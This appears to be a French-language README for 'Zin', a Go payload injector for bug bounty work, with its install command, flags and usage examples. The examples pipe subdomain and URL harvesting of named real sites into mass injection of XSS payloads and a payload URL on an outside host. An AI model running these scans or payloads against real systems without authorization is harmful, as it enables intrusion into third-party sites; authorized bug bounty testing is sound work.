
Un injecteur de payloads pour bug bounty écrit en Go
Un injecteur de payloads pour bug bounty écrit en go
$ go get -u github.com/ethicalhackingplayground/Zin
-✅ Recherche de motifs dans les réponses
-✅ Correspondance des codes de statut
_
(_)
_____ _ __
|_ / | '_ \
/ /| | | | |
/___|_|_| |_|
Que les bounties viennent
-c int
la concurrence (par défaut 20)
-g string
rechercher un motif dans la réponse
-p string
le payload à utiliser
-pL string
la liste des payloads à utiliser
-s int
filtrer par code de statut (par défaut 200)
$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"
$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"
$ cat hosts | gau | grep "&" | Zin -c 80 -pL <fichier_payload>
$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>
$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"
$ cat hosts | gau | Zin -c 80 -p <payload>
Si vous obtenez un bounty, merci de me soutenir en m'offrant un café
